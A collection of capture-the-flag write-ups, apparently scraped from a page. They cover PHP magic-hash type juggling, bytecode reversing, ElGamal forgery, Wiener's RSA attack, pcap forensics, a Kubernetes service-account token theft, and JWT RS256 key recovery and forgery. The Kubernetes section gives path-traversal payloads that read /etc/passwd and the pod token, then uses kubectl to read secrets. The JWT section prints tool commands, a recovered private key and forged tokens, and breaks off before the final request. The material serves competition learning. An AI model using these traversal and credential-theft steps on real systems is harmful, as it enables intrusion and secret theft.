<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
### Login Page

### page's source code```html...<form class="box" action="login.php" method="get"> <h1>Welcome to TMUCTF 2021</h1> <h3>Just login and get the flag:</h3> <input type="password" name="password" placeholder="Password"> <input type="submit" value="Login"></form>...```The password will be sent to `login.php` and it will be checked there.We don't know what `login.php` does.
But, there is *php code* in `/robots.txt`.
[http://185.235.41.189/robots.txt](http://185.235.41.189/robots.txt)
```phpif (isset($_GET["password"])) { if (hash("md5", $_GET["password"]) == $_GET["password"]) { echo "<h1>Here is the flag:</h1>" . $flag; } else { echo "Try harder!"; }}```
The *vulnerability* in this code is using **Loose Comparison** `==` instead of **Strict comparison** `===`.
In **php**,- **Loose comparison** using `==` or `!=` : testing **value** of the variables. `'123' == 123 // true`- **Strict comparison** using `===` or `!==` : testing **both type and value** of the variables. `'123' === 123 // false`
**Php Loose Comparison** also returns *true* if both strings are scientific number.```'0e123' == '0' // true```
In this challenge, we have to give a string which **MD5** hash is the same string as itself.But because of using **Loose Comparison** we can just give a string which hash is like `0e + some digits`.
We can find that kind of strings in [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md#magic-hashes---exploit).
Let's use `0e1137126905`.
[http://185.235.41.189/login.php?password=0e1137126905](http://185.235.41.189/login.php?password=0e1137126905)

And, we get the flag!
*flag*:`TMUCTF{D0_y0u_kn0w_7h3_d1ff3r3nc3_b37w33n_L0053_c0mp4r150n_4nd_57r1c7_c0mp4r150n_1n_PHP!?}` |
 [obscure.zip](https://github.com/Rookie441/CTF/files/7236690/obscure.zip)
> The file is a python byte-compiled file.

> To decompile, rename as `.pyc` and run [uncompyle6](https://pypi.org/project/uncompyle6/) and we get the following:
```python# uncompyle6 version 3.7.4# Python bytecode 2.7 (62211)# Decompiled from: Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:43:08) [MSC v.1926 32 bit (Intel)]# Embedded file name: reverseme.py# Compiled at: 2021-09-04 17:21:21import numpy as npflag = 'TamilCTF{this_one_is_a_liability_dont_fall_for_it}'np.random.seed(369)data = np.array([ ord(c) for c in flag ])extra = np.random.randint(1, 5, len(flag))product = np.multiply(data, extra)temp1 = [ x for x in data ]temp2 = [ ord(x) for x in 'dondaVSclb' * 5 ]c = [ temp1[i] ^ temp2[i] for i in range(len(temp1)) ]flagdata = ('').join(hex(x)[2:].zfill(2) for x in c)real_flag = '300e030d0d1507251700361a3a0127662120093d551c311029330c53022e1d3028541315363c5e3d063d0b250a090c52021f'# okay decompiling reverseme.pyc```
> In the above code, we can see an encryption algorithm running on a sample flag `TamilCTF{this_one_is_a_liability_dont_fall_for_it}`. If we were to `print(flagdata)`, we get:
```300e030d0d15072517160c061d3b0e38363c05113b0e31080837310a000b101631000e38273c0a03080331020e240c0a181f```
> This format is the same as that of `real_flag`, but the values differ. We need to reverse the encryption algorithm and pass in the flagdata of `real_flag` to get the actual flag.
> We can adopt a bruteforce approach whereby we pass every printable ascii character through the algorithm and get the output, then compare it with the ciphertext to map out the ascii flag.
> But first, we should explore the encryption algorithm. In the example below, encrypting the letter `T` gives us `30` which corresponds to the first 2 digits of the flagdata of `real_flag`. Since we know the flag format is `TamilCTF{}`, we can proceed to encrypt the next letter `a`, and we should expect `0e`, which is the next 2 digits of flagdata. However, we are given `05` instead. Strange.
```real_flag = '300e030d0d1507251700361a3a0127662120093d551c311029330c53022e1d3028541315363c5e3d063d0b250a090c52021f'"T" : 30"a" : 05```
> Upon further exploration, I realised that the characters has to be in the correct index before encryption will tally. Here, the letter `a` is at the 2nd position and the result is `0e` as expected.
```"Ta" : 300e"TamilCTF{" : 300e030d0d15072517```
> Thus, we create a string called `flag_decrypted`. We append a printable ascii character and compare it with the algorithm. If output matches with `real_flag`(truncated), continue with the next position, else, revert back to the original string and try a different ascii character. Since we know the flag format, we can start off with `TamilCTF{`. This is the final code:
```pythonimport numpy as npdef algo(flag): np.random.seed(369) data = np.array([ ord(c) for c in flag ]) extra = np.random.randint(1, 5, len(flag)) product = np.multiply(data, extra) temp1 = [ x for x in data ] temp2 = [ ord(x) for x in 'dondaVSclb' * 5 ] c = [ temp1[i] ^ temp2[i] for i in range(len(temp1)) ] flagdata = ('').join(hex(x)[2:].zfill(2) for x in c) return flagdata
flag = 'TamilCTF{this_one_is_a_liability_dont_fall_for_it}'flag_length = len(flag)real_flag = '300e030d0d1507251700361a3a0127662120093d551c311029330c53022e1d3028541315363c5e3d063d0b250a090c52021f'
import stringascii_list = string.printable
flag_decrypted = "TamilCTF{"
for y in range(len(flag_decrypted),flag_length): temp_flag = flag_decrypted for sym in ascii_list: temp_flag+=sym #try ascii char if algo(temp_flag) == real_flag[:2*y]: #check against truncated real_flag flag_decrypted = temp_flag #append correct char else: temp_flag = flag_decrypted #go back to original continue print(flag_decrypted)
flag_decrypted+="}"print(flag_decrypted)```
> We get the following output:
```TamilCTF{TamilCTF{bTamilCTF{bRTamilCTF{bRuTamilCTF{bRuTTamilCTF{bRuTeTamilCTF{bRuTeFTamilCTF{bRuTeF0TamilCTF{bRuTeF0rTamilCTF{bRuTeF0rCTamilCTF{bRuTeF0rCeTamilCTF{bRuTeF0rCe_TamilCTF{bRuTeF0rCe_1TamilCTF{bRuTeF0rCe_1sTamilCTF{bRuTeF0rCe_1s_TamilCTF{bRuTeF0rCe_1s_tTamilCTF{bRuTeF0rCe_1s_tHTamilCTF{bRuTeF0rCe_1s_tHeTamilCTF{bRuTeF0rCe_1s_tHe_TamilCTF{bRuTeF0rCe_1s_tHe_0TamilCTF{bRuTeF0rCe_1s_tHe_0nTamilCTF{bRuTeF0rCe_1s_tHe_0nLTamilCTF{bRuTeF0rCe_1s_tHe_0nLyTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_FTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCeTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bRTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReATamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAkTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk_TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk__TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk__1TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk__1nTamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk__1n}```
`TamilCTF{bRuTeF0rCe_1s_tHe_0nLy_F0rCe_2_bReAk__1n}` |
**Author's Solve**
This an ElGamal signature scheme. The issue is that the message needs to be hashed before it is signed using this system. Unfornuately, that was not done in this case. Also, another mistake made is that a `MASK` is applied to make the signature a certain size. But, the `MASK` is applied only after the checking the contents of the message. Therefore, you can place your message in the parts that will be masked out.
Therefore, you can do a one-parameter existential forgery for the given public key and get past the checking system. Usually, in one-parameter existential forgery, the message is pre-determined based on your calculations needed (see `https://en.wikipedia.org/wiki/ElGamal_signature_scheme#Existential_forgery` for the calculations). But, becuase of the `MASK`, it is easier to fool the system.
After submitting a forged signature, they would get the flag from the server.
For the script implementation, please check out `solution.py`. |
___# RSA - 3_(crypto, 250 points, 85 solves)_
Alright, this is the big leagues. You have someone's Public Key. This isn't unusual, if you want to send someone an encrypted message, you have to have thier public key.Your job is to evaluate this public key, and obtain the value of the secret exponent or decryption exponent (The value of "d" in an RSA encryption).
Wrap the number that you find with dsc{<number>}!
[mykey.pub](./mykey.pub)___
## InvestigationFrom the challenge description it can be deduced that `mykey.pub` is a [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)) public key.So I first extracted the modulus `n` and public exponent `e` from it with `openssl rsa -in mykey.pub -noout -text -pubin`. Looking at a _very_ big `e`I took an educated guess that maybe `d` would be sufficently small (namely `d < 1/3n^(1/4)`), which could then be exploited by leveraging[Wiener's Attack](https://en.wikipedia.org/wiki/Wiener%27s_attack).
## SolutionUsing Wiener's Attack based on continued fractions and their convergents I was able to recover `d` from the public key.
See [exploit](./exploit.py) for an implementation in python.
> dsc{6393313697836242618414301946448995659516429576261871356767102021920538052481829568588047189447471873340140537810769433878383029164089236876209147584435733} |
# Here's a Flag
(Web, 150, 223 Solves)
A quick teaser to get yourself ready for the challenges to come! Just look for/at the flag and perhaps try your hand at some frontend tomfoolery?
`very.uniquename.xyz:2086`
### Investigation
Upon opening the above mentioned link, you'll be greeted with a pretty basic page with a flag image on it.
The first point of analysis, as usual is to read the source code. It contains a sample flag meant for teasing.
Source code has two links: [styles.css](http://very.uniquename.xyz:2086/styles.css) and [index.js](http://very.uniquename.xyz:2086/index.js)
Information is index.js is provided only to mislead you and eat your time.
Check the styles.css webpage. The flag is embedded in it as `gvf{zh0frph_wr_ghfrqvwuxfwi}` and it is mentioned that it is a caesar cipher with a key of +3.
Decoding it will give the flag:
`dsc{we1come_to_deconstructf}` |
# Pirates---(Forensics, 150, 225 Solves)
Mr.Reed and his pirating ring has finally been caught by the police but unfortunately we dont have enough evidence to indict him.All we could get is a network capture of his private network. Can you find any evidence to be used against him ?
[network_listen.pcap](https://github.com/gddaredevil/writeups/blob/master/DeconstruCT.F_2021/pirates/network_listen.pcap)
---
### Investigation---
The provided file is a packet capture file. Use Wireshark to analyse it with the command `wireshark network_listen.pcap`.
Scrolling through the different packets transmitted, you can find a few `HTTP` packets. Find the http packet with a GET request to '/i_COULD_have_the_flag.mp4.torrent' directory. Right-click on it and select Follow > HTTP Stream.You can find the flag in the HTTP Stream.
`dsc{H3_1S_th3_83sT_p1r4t3_1_H4V3_3V3r_s33n}`
 |
# Whale Blog
This was in the cloud section and the info was a strong hint that this involved Docker and a link to a website http://whale-blog.duc.tf:30000.
I spent a bit of time looking around the website and clicking on the available links. The other blogs on the site were being loaded by a query parameter in the URL `?page=page1`. Because I'm an optimistic soul, I immediately tried `?page=flag` which didn't get me a flag but did show me in the dev tools that the server tried to load the file specified in the query and printed the output as a comment in the HTML. The error message was```>Warning: file_get_contents(./page3): Failed to open stream: No such file or directory in /var/www/html/index.php on line 6```From this, I wondered if I could get any other files in the server container. `?page=../../../etc/passwd` went very well and printed out the contents of `/etc/passwd` as a comment in the HTML. However, it didn't get me closer to finding a flag and I couldn't find an obvious `flag.txt` file in the container to read.
I decided to have a look at the volumes mounted onto the container and so put `?page=../../../proc/mounts`. This revealed a mount called `/run/secrets/kubernetes.io/serviceaccount`, indicating that the container was running on kubernetes and that was the service account details for the pod to authenticate with the kubernetes api-server.
This was very interesting, so I quickly looked up the general format of `/run/secrets/kubernetes.io/serviceaccount` and found out that it normally contains a `ca.crt` file and a `token` file, containing the certificate and token respectively. At this point I moved away from the browser and dev tools to make it a bit easier to copy the secrets out. Running```curl "http://whale-blog.duc.tf:30000/?page=../../../run/secrets/kubernetes.io/serviceaccount/ca.crt"curl "http://whale-blog.duc.tf:30000/?page=../../../run/secrets/kubernetes.io/serviceaccount/token"```got me the certificate and the JWT token the server pod uses to connect to the api-server of the kubernetes cluster it runs in.
At this point I was theoretically able to connect to the kubernetes cluster running the site using the pod's credentials, however I didn't know where the api-server was. Fortunately there was a helping hand in the form of a comment in the web HTML: "I wonder if we will deploy this at whale-blog.duc.tf or at whale-endpoint.duc.tf", so I decided to give whale-endpoint.duc.tf a go. The kubernetes api-server normally serves out of port 443 so I ran```curl -X GET https://whale-endpoint.duc.tf/api/core/v1/secrets --insecure```which produced```{ "kind": "Status", "apiVersion": "v1", "metadata": {
}, "status": "Failure", "message": "v1 \"secrets\" is forbidden: User \"system:anonymous\" cannot get resource \"v1\" in API group \"\" at the cluster scope", "reason": "Forbidden", "details": { "name": "secrets", "kind": "v1" }, "code": 403}```indicating I'd found my api-server. I then saved the token as $TOKEN and ran```curl -X GET https://whale-endpoint.duc.tf/api/core/v1/secrets --header "Authorization: Bearer $TOKEN" --insecure```for further confirmation before configuring kubectl to use this token and cluster and having a look around:```kubectl config set-credentials ductf --token=$TOKENkubectl config set-cluster ductf --insecure-skip-tls-verify --server=https://whale-endpoint.duc.tfkubectl config set-context ductf --cluster=ductf --namespace=default --user=ductfkubectl config use-context ductfkubectl get secrets # showed a secret called nooooo-dont-read-mekubectl get secret -o yaml nooooo-dont-read-me```I could get the base64 encoded version of the secret from the yaml of noooo-dont-read-me. Base64 decoding it produced the flag!
I really enjoyed this challenge but did have one pedantic niggle. It said in a few places that it's a Docker challenge but really it's a Kubernetes challenge :P |

[https://web-jwt-b9766b1f.chal-2021.duc.tf/](https://web-jwt-b9766b1f.chal-2021.duc.tf/)
JWT stands for JSON Web Token
Visiting the challenge link returns this page:
```from flask import Flask, requestimport jwt, time, os
app = Flask(__name__)app.config['SECRET_KEY'] = os.urandom(24)
private_key = open('priv').read()public_key = open('pub').read()flag = open('flag.txt').read()
@app.route("/get_token")def get_token(): return jwt.encode({'admin': False, 'now': time.time()}, private_key, algorithm='RS256')
@app.route("/get_flag", methods=['POST'])def get_flag(): try: payload = jwt.decode(request.form['jwt'], public_key, algorithms=['RS256']) if payload['admin']: return flag except: return ":("
@app.route("/")def sauce(): return "%s" % open(__file__).read()
if __name__ == "__main__": app.run(host="0.0.0.0", port=5000)```
Good news! There are only two web endpoints we need to study. :)
Bad news! I know of no way to brute force JWTs using RS256. :(
Let's start by just playing around with the endpoints.
# /get_token
[https://web-jwt-b9766b1f.chal-2021.duc.tf/get_token](https://web-jwt-b9766b1f.chal-2021.duc.tf/get_token)
We hit /get_token and get this response:
```eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw```
We can see from the Python code the data that should be encoded inside this token. However let's visit jwt.io just for fun.
[https://jwt.io/](https://jwt.io/)
We visit this site and then paste in the token we got back from **/get_token**:

# /get_flag
Studying the Python code, it is clear that we need to forge a "valid" JWT with **"admin": true** and POSTing it to **/get_flag**.
In order to do this, we somehow need to obtain the private key that the code loads here:```private_key = open('priv').read()```
However, there seems to be no way to convince the application to give this to us directly.
Neither is there any way to obtain even the public key.
# Plan of AttackAfter some pondering, I reviewed some of my notes from previous CTFs and found these two pieces of information:
1. One CTF JWT challenge was solved by using a special tool to obtain the public key from **two** separately-generated JWTs.2. Another CTF JWT challenge was solved by using a (different) special tool to obtain an RS256 private key from a "weak" public key.
Given this, my plan was to use the special tool from item 1 to obtain a public key and then hope that public key was weak and that the other special tool could generate the private key from it. If that works, then we can forge a new JWT with **"admin": true** and POST it to **/get_flag**.
Let's try and see how it goes.
# Attack Part 1
I made two separate calls to **/get_token** and got these tokens:
```eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjc0MS40NDAyMzA0fQ.DxCSrEVez5gtm_Xfjq1eaiGRf5PKNeYXti3loMHYMURKQdjILlp1dZlCSed1Y4R1B9mOsbAujxOYCLsdjQhzIbLV04XHZ96UOXH0dXaqNTb_PBxCsZ5ELs_CFX6qNm9MJA```
Here is the special tool mentioned earlier:
[https://github.com/silentsignal/rsa_sign2n](https://github.com/silentsignal/rsa_sign2n)
## Setup Attempt 1```git clone [email protected]:silentsignal/rsa_sign2n.gitcd rsa_sign2ncd standalonepip3 install -r requirements.txt```
## Execution Attempt 1```python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjc0MS40NDAyMzA0fQ.DxCSrEVez5gtm_Xfjq1eaiGRf5PKNeYXti3loMHYMURKQdjILlp1dZlCSed1Y4R1B9mOsbAujxOYCLsdjQhzIbLV04XHZ96UOXH0dXaqNTb_PBxCsZ5ELs_CFX6qNm9MJA
Traceback (most recent call last): File "/Users/sambrow/hack_nobackup/rsa_sign2n/standalone/jwt_forgery.py", line 71, in <module> padded0 = PKCS1_v1_5.EMSA_PKCS1_V1_5_ENCODE(sha256_0, len(jwt0_sig_bytes))AttributeError: module 'Crypto.Signature.PKCS1_v1_5' has no attribute 'EMSA_PKCS1_V1_5_ENCODE'```
Argh! Something went wrong but I'm unsure how to troubleshoot it.
I then noticed a `Dockerfile` inside the `standalone` folder.
Yay! I love Docker since it allows the package author to distribute a docker image that will have all of the dependencies it needs already correctly configured. This solves the "it works on my computer but not on your computer" problem.
So, let's create this Docker image.
This assumes you've installed Docker already and are cd'd into the `rsa_sign2n/standalone` folder:
## Setup Attempt 2```# builds the imagedocker build . -t sig2n
# starts the container and gives me a bash shelldocker run -it sig2n /bin/bash```
This gives me a bash prompt like this:```root@2b3885dcfaca:/app#```
## Execution Attempt 2```root@732dc2a48bc8:/app# python3 jwt_forgery.py eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjcyMC41NjkyMTk4fQ.DGGgcbIX160FUcUr6JWLn8HLGQM3n_DuIQ0tDx0AcTKXr_72_Z6LdMFo33yScKiobGFpjzlAg6lDMsCa4UkJqQfteA38Mo74B7ITHpjh0tnXrxejm20F-X23kTkKT_SLVw eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6ZmFsc2UsIm5vdyI6MTYzMjUzNjc0MS40NDAyMzA0fQ.DxCSrEVez5gtm_Xfjq1eaiGRf5PKNeYXti3loMHYMURKQdjILlp1dZlCSed1Y4R1B9mOsbAujxOYCLsdjQhzIbLV04XHZ96UOXH0dXaqNTb_PBxCsZ5ELs_CFX6qNm9MJA
[*] GCD: 0x1d[*] GCD: 0x108b7c75aee1e2b9df3692a2cc54b100d111002193ebc9c3cf575e4b16f595cc28d9b47a65d1f3774aa3db05649085589230fe23bfcc2ef876b4134dafde4484d7bde8c9b80016d9c9aed53a0334ae3483cc833374301e1a7829a5f5800a793803[+] Found n with multiplier 1 : 0x108b7c75aee1e2b9df3692a2cc54b100d111002193ebc9c3cf575e4b16f595cc28d9b47a65d1f3774aa3db05649085589230fe23bfcc2ef876b4134dafde4484d7bde8c9b80016d9c9aed53a0334ae3483cc833374301e1a7829a5f5800a793803[+] Written to 108b7c75aee1e2b9_65537_x509.pem[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0._rQf-v9lQvZInV6MBEjkBqzuEcPtx-gaobU0oHtjpHY'[+] Written to 108b7c75aee1e2b9_65537_pkcs1.pem[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.-xQ_LSF9jJaAEdd2PCgPZjZVwlX8wAD4H2P7lTZOw84'[+] Found n with multiplier 29 : 0x920d1e8a71b85eaf6bd01744d6c84f79f7c2361f955f3bb7b3907e2cedfc567cfeadf290c09e76df43717bc5acb5265d51233f069d1c1a390f097e43db86c6c9a571f54cf72ced06f45fa0e5a0b68f0d5f53f8f259ef620424bf1a1ee5e0de9f[+] Written to 920d1e8a71b85eaf_65537_x509.pem[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.V1XnPFpwKbK3IuFNChLZU0XkvMUyzjIKwSVQEyjIqIs'[+] Written to 920d1e8a71b85eaf_65537_pkcs1.pem[+] Tampered JWT: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.a1fUyscIftGuetBSD1OnIKKY8p-DjMB6sIMJibWpnpM'================================================================================Here are your JWT's once again for your copypasting pleasure================================================================================eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0._rQf-v9lQvZInV6MBEjkBqzuEcPtx-gaobU0oHtjpHYeyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.-xQ_LSF9jJaAEdd2PCgPZjZVwlX8wAD4H2P7lTZOw84eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.V1XnPFpwKbK3IuFNChLZU0XkvMUyzjIKwSVQEyjIqIseyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pbiI6IGZhbHNlLCAibm93IjogMTYzMjUzNjcyMC41NjkyMTk4LCAiZXhwIjogMTYzMjYyMzE5OX0.a1fUyscIftGuetBSD1OnIKKY8p-DjMB6sIMJibWpnpM```
We can ignore all the output and focus on these two lines:
```[+] Written to 108b7c75aee1e2b9_65537_x509.pem[+] Written to 920d1e8a71b85eaf_65537_x509.pem```
These are the TWO possible public keys that it generated from the tokens we gave it.
From experience, this is probabilistic. At first I tried two **different** tokens and it generated SIX possible public keys. I didn't want to try all of those so I just generated two new tokens and re-ran it. I got lucky then in that it generated only TWO.
Let's see what the first public key looks like:
```root@732dc2a48bc8:/app# cat 108b7c75aee1e2b9_65537_x509.pem-----BEGIN PUBLIC KEY-----MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhEIt8da7h4rnfNpKizFSxANERACGT68nDz1deSxb1lcwo2bR6ZdHzd0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZya7VOgM0rjSDzIMzdDAeGngppfWACnk4AwIDAQAB-----END PUBLIC KEY-----```
We'll run with this for now and return to get the second public key if needed.
# Attack Part 2
Now that we have a public key, let's use the other special tool to see if we can generate a private key from it (which is only possible if it is a "weak" public key).
## Setup
In this case here is the special tool we need:
[https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
```git clone [email protected]:Ganapati/RsaCtfTool.gitcd RsaCtfToolpip3 install -r requirements.txt```
## Execution
I first setup a local file called `public.key` with the key we found earlier:
```-----BEGIN PUBLIC KEY-----MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhEIt8da7h4rnfNpKizFSxANERACGT68nDz1deSxb1lcwo2bR6ZdHzd0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZya7VOgM0rjSDzIMzdDAeGngppfWACnk4AwIDAQAB-----END PUBLIC KEY-----```
We can then use this special took to try to generate a private key:
```python3 RsaCtfTool.py --publickey ./public.key --private
[*] Testing key ./public.key.[*] Performing pastctfprimes attack on ./public.key.\297337.74it/s][*] Performing system_primes_gcd attack on ./public.key. 0%|▍ | 21/7007 [00:00<00:08, 789.12it/s][*] Attack success with system_primes_gcd method !
Results for ./public.key:
Private key :-----BEGIN RSA PRIVATE KEY-----MIIB+wIBAAJhEIt8da7h4rnfNpKizFSxANERACGT68nDz1deSxb1lcwo2bR6ZdHzd0qj2wVkkIVYkjD+I7/MLvh2tBNNr95EhNe96Mm4ABbZya7VOgM0rjSDzIMzdDAeGngppfWACnk4AwIDAQABAmEKpfUIG6wBMAOtnv0vdki0XiDfW6KTMDRDvdcjryUdsIi8WaAV8ZW9z9XWw/v8U/4DrOzW5nJwm2BwMRfpIfKlS/QW0gX/TR+btntJc6P8wnks0vynK8S9A+l4kegxYrSxAmEAkg0einG4Xq9r0BdE1shPeffCNh+VXzu3s5B+LO38Vnz+rfKQwJ5230Nxe8WstSZdUSM/Bp0cGjkPCX5D24bGyaVx9Uz3LO0G9F+g5aC2jw1fU/jyWe9iBCS/Gh7l4N6fAgEdAmBhCOJfrQqHrhj9WlhcMx3KtTeNahJ+AVkdrkSGaV+bvtQekehmcWIdF9wQFdeXS3P4cmhvZnbDXWGGNyOyeKseUhOSnJ4kdR6HwflOVyaziHjre5zY79i5VAi7vAeTDZUCAQUCYG7MKNL1KsNqmGjlg6vEGPtsga15EDaXO+lTIe0eeM7aaO3kJzEFdKlfTUNp0nfE1AiWUx+AA6n2UgczpjybNbN0rroXE8nOS+WGVr/bBhQ/HC4MTevzZNcBZNYFyN+OZw==-----END RSA PRIVATE KEY-----```
It worked!
# Attack Part 3
Armed with a private key, let's go back to jwt.io to try to forge our desired token.
We first edit:
```"admin": true```
and then paste our private token into the second box in the VERIFY SIGNATURE section:

This then generated a token on the left side.
```eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhZG1pbiI6dHJ1ZSwibm93IjoxNjMyNTM2NzYxLjQ2NTE3MzJ9.Chjv26Mt7SJ9A0h2Mf25nwjvpf4Lb8cTj2QliJDPZrPlXVC37LI3fcLylLezLe-wtJz3mGAY1FRvIqvoaie4OBiwygZ_DrTtwiIj5tkbcgbJeHf3M8qEB8pFwQGaDwh1Tg```
# Attack Part 4
Let's now try POSTing this to `/get_flag`.
There are many tools you can use (PostMan) but I like to use Burp Suite's **Repeater** tab. This allows me to edit the HTTP request any way I like.
It is important to add the Content-Type correctly:
`Content-Type: application/x-www-form-urlencoded`
